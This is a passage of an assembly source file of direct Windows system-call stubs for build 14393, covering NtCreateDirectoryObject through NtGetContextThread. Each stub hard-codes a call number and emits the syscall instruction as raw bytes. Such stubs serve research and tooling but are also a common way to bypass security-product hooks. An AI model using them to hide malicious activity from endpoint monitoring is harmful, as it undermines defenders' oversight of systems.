_10_0_14393_sp0_windows_10_rs1_1607_NtCreateDirectoryObject PROC STDCALL
mov r10 , rcx
mov eax , 156
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateDirectoryObject ENDP
; ULONG64 __stdcall NtCreateDirectoryObjectEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateDirectoryObjectEx PROC STDCALL
mov r10 , rcx
mov eax , 157
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateDirectoryObjectEx ENDP
; ULONG64 __stdcall NtCreateEnclave( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateEnclave PROC STDCALL
mov r10 , rcx
mov eax , 158
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateEnclave ENDP
; ULONG64 __stdcall NtCreateEnlistment( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateEnlistment PROC STDCALL
mov r10 , rcx
mov eax , 159
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateEnlistment ENDP
; ULONG64 __stdcall NtCreateEventPair( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateEventPair PROC STDCALL
mov r10 , rcx
mov eax , 160
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateEventPair ENDP
; ULONG64 __stdcall NtCreateIRTimer( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateIRTimer PROC STDCALL
mov r10 , rcx
mov eax , 161
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateIRTimer ENDP
; ULONG64 __stdcall NtCreateIoCompletion( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateIoCompletion PROC STDCALL
mov r10 , rcx
mov eax , 162
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateIoCompletion ENDP
; ULONG64 __stdcall NtCreateJobObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateJobObject PROC STDCALL
mov r10 , rcx
mov eax , 163
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateJobObject ENDP
; ULONG64 __stdcall NtCreateJobSet( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateJobSet PROC STDCALL
mov r10 , rcx
mov eax , 164
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateJobSet ENDP
; ULONG64 __stdcall NtCreateKeyTransacted( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateKeyTransacted PROC STDCALL
mov r10 , rcx
mov eax , 165
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateKeyTransacted ENDP
; ULONG64 __stdcall NtCreateKeyedEvent( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateKeyedEvent PROC STDCALL
mov r10 , rcx
mov eax , 166
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateKeyedEvent ENDP
; ULONG64 __stdcall NtCreateLowBoxToken( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateLowBoxToken PROC STDCALL
mov r10 , rcx
mov eax , 167
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateLowBoxToken ENDP
; ULONG64 __stdcall NtCreateMailslotFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateMailslotFile PROC STDCALL
mov r10 , rcx
mov eax , 168
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateMailslotFile ENDP
; ULONG64 __stdcall NtCreateMutant( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateMutant PROC STDCALL
mov r10 , rcx
mov eax , 169
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateMutant ENDP
; ULONG64 __stdcall NtCreateNamedPipeFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 , ULONG64 arg_12 , ULONG64 arg_13 , ULONG64 arg_14 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateNamedPipeFile PROC STDCALL
mov r10 , rcx
mov eax , 170
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateNamedPipeFile ENDP
; ULONG64 __stdcall NtCreatePagingFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreatePagingFile PROC STDCALL
mov r10 , rcx
mov eax , 171
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreatePagingFile ENDP
; ULONG64 __stdcall NtCreatePartition( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreatePartition PROC STDCALL
mov r10 , rcx
mov eax , 172
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreatePartition ENDP
; ULONG64 __stdcall NtCreatePort( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreatePort PROC STDCALL
mov r10 , rcx
mov eax , 173
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreatePort ENDP
; ULONG64 __stdcall NtCreatePrivateNamespace( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreatePrivateNamespace PROC STDCALL
mov r10 , rcx
mov eax , 174
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreatePrivateNamespace ENDP
; ULONG64 __stdcall NtCreateProcess( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateProcess PROC STDCALL
mov r10 , rcx
mov eax , 175
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateProcess ENDP
; ULONG64 __stdcall NtCreateProfile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateProfile PROC STDCALL
mov r10 , rcx
mov eax , 176
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateProfile ENDP
; ULONG64 __stdcall NtCreateProfileEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateProfileEx PROC STDCALL
mov r10 , rcx
mov eax , 177
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateProfileEx ENDP
; ULONG64 __stdcall NtCreateRegistryTransaction( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateRegistryTransaction PROC STDCALL
mov r10 , rcx
mov eax , 178
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateRegistryTransaction ENDP
; ULONG64 __stdcall NtCreateResourceManager( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateResourceManager PROC STDCALL
mov r10 , rcx
mov eax , 179
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateResourceManager ENDP
; ULONG64 __stdcall NtCreateSemaphore( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateSemaphore PROC STDCALL
mov r10 , rcx
mov eax , 180
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateSemaphore ENDP
; ULONG64 __stdcall NtCreateSymbolicLinkObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateSymbolicLinkObject PROC STDCALL
mov r10 , rcx
mov eax , 181
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateSymbolicLinkObject ENDP
; ULONG64 __stdcall NtCreateThreadEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateThreadEx PROC STDCALL
mov r10 , rcx
mov eax , 182
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateThreadEx ENDP
; ULONG64 __stdcall NtCreateTimer( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateTimer PROC STDCALL
mov r10 , rcx
mov eax , 183
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateTimer ENDP
; ULONG64 __stdcall NtCreateTimer2( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateTimer2 PROC STDCALL
mov r10 , rcx
mov eax , 184
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateTimer2 ENDP
; ULONG64 __stdcall NtCreateToken( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 , ULONG64 arg_12 , ULONG64 arg_13 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateToken PROC STDCALL
mov r10 , rcx
mov eax , 185
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateToken ENDP
; ULONG64 __stdcall NtCreateTokenEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 , ULONG64 arg_12 , ULONG64 arg_13 , ULONG64 arg_14 , ULONG64 arg_15 , ULONG64 arg_16 , ULONG64 arg_17 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateTokenEx PROC STDCALL
mov r10 , rcx
mov eax , 186
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateTokenEx ENDP
; ULONG64 __stdcall NtCreateTransaction( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateTransaction PROC STDCALL
mov r10 , rcx
mov eax , 187
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateTransaction ENDP
; ULONG64 __stdcall NtCreateTransactionManager( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateTransactionManager PROC STDCALL
mov r10 , rcx
mov eax , 188
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateTransactionManager ENDP
; ULONG64 __stdcall NtCreateUserProcess( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateUserProcess PROC STDCALL
mov r10 , rcx
mov eax , 189
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateUserProcess ENDP
; ULONG64 __stdcall NtCreateWaitCompletionPacket( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateWaitCompletionPacket PROC STDCALL
mov r10 , rcx
mov eax , 190
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateWaitCompletionPacket ENDP
; ULONG64 __stdcall NtCreateWaitablePort( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateWaitablePort PROC STDCALL
mov r10 , rcx
mov eax , 191
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateWaitablePort ENDP
; ULONG64 __stdcall NtCreateWnfStateName( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateWnfStateName PROC STDCALL
mov r10 , rcx
mov eax , 192
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateWnfStateName ENDP
; ULONG64 __stdcall NtCreateWorkerFactory( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 );
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateWorkerFactory PROC STDCALL
mov r10 , rcx
mov eax , 193
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtCreateWorkerFactory ENDP
; ULONG64 __stdcall NtDebugActiveProcess( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDebugActiveProcess PROC STDCALL
mov r10 , rcx
mov eax , 194
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDebugActiveProcess ENDP
; ULONG64 __stdcall NtDebugContinue( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDebugContinue PROC STDCALL
mov r10 , rcx
mov eax , 195
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDebugContinue ENDP
; ULONG64 __stdcall NtDeleteAtom( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteAtom PROC STDCALL
mov r10 , rcx
mov eax , 196
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteAtom ENDP
; ULONG64 __stdcall NtDeleteBootEntry( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteBootEntry PROC STDCALL
mov r10 , rcx
mov eax , 197
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteBootEntry ENDP
; ULONG64 __stdcall NtDeleteDriverEntry( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteDriverEntry PROC STDCALL
mov r10 , rcx
mov eax , 198
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteDriverEntry ENDP
; ULONG64 __stdcall NtDeleteFile( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteFile PROC STDCALL
mov r10 , rcx
mov eax , 199
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteFile ENDP
; ULONG64 __stdcall NtDeleteKey( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteKey PROC STDCALL
mov r10 , rcx
mov eax , 200
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteKey ENDP
; ULONG64 __stdcall NtDeleteObjectAuditAlarm( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteObjectAuditAlarm PROC STDCALL
mov r10 , rcx
mov eax , 201
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteObjectAuditAlarm ENDP
; ULONG64 __stdcall NtDeletePrivateNamespace( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDeletePrivateNamespace PROC STDCALL
mov r10 , rcx
mov eax , 202
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDeletePrivateNamespace ENDP
; ULONG64 __stdcall NtDeleteValueKey( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteValueKey PROC STDCALL
mov r10 , rcx
mov eax , 203
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteValueKey ENDP
; ULONG64 __stdcall NtDeleteWnfStateData( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteWnfStateData PROC STDCALL
mov r10 , rcx
mov eax , 204
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteWnfStateData ENDP
; ULONG64 __stdcall NtDeleteWnfStateName( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteWnfStateName PROC STDCALL
mov r10 , rcx
mov eax , 205
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDeleteWnfStateName ENDP
; ULONG64 __stdcall NtDisableLastKnownGood( );
_10_0_14393_sp0_windows_10_rs1_1607_NtDisableLastKnownGood PROC STDCALL
mov r10 , rcx
mov eax , 206
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDisableLastKnownGood ENDP
; ULONG64 __stdcall NtDisplayString( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDisplayString PROC STDCALL
mov r10 , rcx
mov eax , 207
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDisplayString ENDP
; ULONG64 __stdcall NtDrawText( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtDrawText PROC STDCALL
mov r10 , rcx
mov eax , 208
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtDrawText ENDP
; ULONG64 __stdcall NtEnableLastKnownGood( );
_10_0_14393_sp0_windows_10_rs1_1607_NtEnableLastKnownGood PROC STDCALL
mov r10 , rcx
mov eax , 209
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtEnableLastKnownGood ENDP
; ULONG64 __stdcall NtEnumerateBootEntries( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtEnumerateBootEntries PROC STDCALL
mov r10 , rcx
mov eax , 210
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtEnumerateBootEntries ENDP
; ULONG64 __stdcall NtEnumerateDriverEntries( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtEnumerateDriverEntries PROC STDCALL
mov r10 , rcx
mov eax , 211
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtEnumerateDriverEntries ENDP
; ULONG64 __stdcall NtEnumerateSystemEnvironmentValuesEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtEnumerateSystemEnvironmentValuesEx PROC STDCALL
mov r10 , rcx
mov eax , 212
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtEnumerateSystemEnvironmentValuesEx ENDP
; ULONG64 __stdcall NtEnumerateTransactionObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtEnumerateTransactionObject PROC STDCALL
mov r10 , rcx
mov eax , 213
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtEnumerateTransactionObject ENDP
; ULONG64 __stdcall NtExtendSection( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtExtendSection PROC STDCALL
mov r10 , rcx
mov eax , 214
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtExtendSection ENDP
; ULONG64 __stdcall NtFilterBootOption( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtFilterBootOption PROC STDCALL
mov r10 , rcx
mov eax , 215
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFilterBootOption ENDP
; ULONG64 __stdcall NtFilterToken( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtFilterToken PROC STDCALL
mov r10 , rcx
mov eax , 216
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFilterToken ENDP
; ULONG64 __stdcall NtFilterTokenEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 , ULONG64 arg_12 , ULONG64 arg_13 , ULONG64 arg_14 );
_10_0_14393_sp0_windows_10_rs1_1607_NtFilterTokenEx PROC STDCALL
mov r10 , rcx
mov eax , 217
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFilterTokenEx ENDP
; ULONG64 __stdcall NtFlushBuffersFileEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtFlushBuffersFileEx PROC STDCALL
mov r10 , rcx
mov eax , 218
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFlushBuffersFileEx ENDP
; ULONG64 __stdcall NtFlushInstallUILanguage( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtFlushInstallUILanguage PROC STDCALL
mov r10 , rcx
mov eax , 219
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFlushInstallUILanguage ENDP
; ULONG64 __stdcall NtFlushInstructionCache( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtFlushInstructionCache PROC STDCALL
mov r10 , rcx
mov eax , 220
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFlushInstructionCache ENDP
; ULONG64 __stdcall NtFlushKey( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtFlushKey PROC STDCALL
mov r10 , rcx
mov eax , 221
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFlushKey ENDP
; ULONG64 __stdcall NtFlushProcessWriteBuffers( );
_10_0_14393_sp0_windows_10_rs1_1607_NtFlushProcessWriteBuffers PROC STDCALL
mov r10 , rcx
mov eax , 222
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFlushProcessWriteBuffers ENDP
; ULONG64 __stdcall NtFlushVirtualMemory( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtFlushVirtualMemory PROC STDCALL
mov r10 , rcx
mov eax , 223
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFlushVirtualMemory ENDP
; ULONG64 __stdcall NtFlushWriteBuffer( );
_10_0_14393_sp0_windows_10_rs1_1607_NtFlushWriteBuffer PROC STDCALL
mov r10 , rcx
mov eax , 224
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFlushWriteBuffer ENDP
; ULONG64 __stdcall NtFreeUserPhysicalPages( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtFreeUserPhysicalPages PROC STDCALL
mov r10 , rcx
mov eax , 225
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFreeUserPhysicalPages ENDP
; ULONG64 __stdcall NtFreezeRegistry( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtFreezeRegistry PROC STDCALL
mov r10 , rcx
mov eax , 226
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFreezeRegistry ENDP
; ULONG64 __stdcall NtFreezeTransactions( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtFreezeTransactions PROC STDCALL
mov r10 , rcx
mov eax , 227
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtFreezeTransactions ENDP
; ULONG64 __stdcall NtGetCachedSigningLevel( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtGetCachedSigningLevel PROC STDCALL
mov r10 , rcx
mov eax , 228
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtGetCachedSigningLevel ENDP
; ULONG64 __stdcall NtGetCompleteWnfStateSubscription( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtGetCompleteWnfStateSubscription PROC STDCALL
mov r10 , rcx
mov eax , 229
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtGetCompleteWnfStateSubscription ENDP
; ULONG64 __stdcall NtGetContextThread( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtGetContextThread PROC STDCALL
mov r10 , rcx
mov eax , 230
;syscall
db 0Fh , 05h
ret
